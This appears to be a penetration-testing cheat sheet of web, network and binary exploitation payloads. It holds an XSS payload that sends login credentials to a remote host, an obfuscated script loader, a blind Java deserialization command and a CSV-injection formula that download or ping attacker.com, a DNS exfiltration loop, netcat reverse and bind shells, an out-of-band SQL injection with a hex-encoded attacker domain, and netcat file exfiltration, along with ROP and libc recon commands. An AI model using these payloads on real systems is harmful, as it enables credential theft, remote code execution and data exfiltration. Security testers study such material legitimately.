Web Exploitation

1. [Payloads] Cross Site Scripting Attack

   • Exfilterate password with Ajax jquery

   $.get("https://localhost/"+document.getElementsByName('username')[2].value+document.getElementsByName('password')[3].value,0);
   

   • Include external JS script in script context with Ajax jquery

   Mainly useful when payload size is very restrictive

   $.getScript(String.fromCharCode(104,116,116,112,58,47,47,120,115,115,47,116,46,106,115),1)
   

2. [Payloads] Deserialization Attacks

   • Dealing with .exec() problem in Blind Java Deserialization

   java -jar ysoserial.jar CommonsCollections1 'sh -c $@|sh . echo ping $(whoami).<attacker.com>' | base64 | tr -d "\n"
   

3. [Payloads] CSV Injection Out of band Exploitation

   =cmd|' /C powershell Invoke-WebRequest "https://attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
   

Network

1. DNS Exfiltration

   • On Victim machine Linux

     for i in `ls`; do host $i.domain.com domain.com;done
     

   • On Attacker’s machine

     tcpdump -vvv -s 0 -l -n dst host domain.com and dst port 53 -w dump
     

   • To view data only for saved packet dump

     tcpdump -r dump|cut -d"?" -f2|awk 'split($0,a,".domain"){print a[1]}'|sort -u
     

2. Reverse and Bind shells

   • Reverse shell With Traditional Netcat [Without -e flag]

     /usr/bin/mknod /tmp/bp p;/bin/nc <attacker_ip> 1337 0</tmp/bp | /bin/sh 1>/tmp/bp
     

     /usr/bin/mkfifo /tmp/mf;/bin/nc <attacker_ip> 1337 < /tmp/mf | /bin/sh &>/tmp/mf
     

   • Bind shell with Traditional Netcat [Without -e flag]

      /usr/bin/mkfifo /tmp/bmf;nc -lk 1337 0< /tmp/bmf | /bin/sh &>/tmp/bmf
     

3. Debugging Servers

   • HTTPS Server

# Generate Server Certificate 
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# python simple-https-server.py

import BaseHTTPServer, SimpleHTTPServer
import ssl

httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()

   

• SMTP Server

  python -m smtpd -n -c DebuggingServer localhost:25
  

Binary Exploitation

1. Linux
   1. Find the offset of /bin/sh in libc

      strings -a -t x /lib/libc-2.11.2.so |grep "/bin/sh"
      

   2. Find ROP gadgets

      objdump -d -M intel ./<binary.elf>|grep -B5 "ret"
      

   3. Find if stack is execuatble and writable memory locations

      readelf -lS ./<binary.elf>
      

   4. Find memory address of Global offset table

      objdump -R ./binary.elf
      

   5. Get Entry point of ELF file

      readelf -h ./binary.elf
      

   6. Get file headers, section headers and program headers

      readelf -e ./binary.elf
      

Binary Protection Checks

• Check debug information for binaries

   find . -type f -iname "*.so" -executable -exec echo -e "\r\n" \; -exec file {} \;
  

• To list the symbol information

     nm -an <binary_name>
  

• Check if stack is executable with gdb-peda checksec

     find . -type f -iname "*.so" -exec echo {} \; -exec gdb -q --batch -ex checksec -ex quit  {} \;
  

• Check if stack is executable readelf

     find . -type f -iname "*.so" -exec echo {} \; -exec readelf -l  {} \; | grep -i -A1 GNU_STACK
  

• Check binary protections for binaries in iOS apps

     find . -type f -executable -exec echo {} \;  -exec sh -c "rabin2 -I {} |grep --color -E \"nx|pic|canary|relocs|stripped\"" \;
  

MISC

• Important Links

  • One liners to download and execute payload (Windows)
    • https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
  • Out of Band SQL Injection without quotes (MySQL)

    12,13) union select LOAD_FILE(group_concat(0x2f2f2f2f,(select @@version_compile_os),0x2e61747461636b65722e636f6d2f2f6d7973716c5f65787472616374)),2 -- 
    

  • Transfer large files over network (netcat & tar)

      tar -cf - <dir>|nc <attacker_ip> <port>
      nc -lnvp <port> |tar -xf -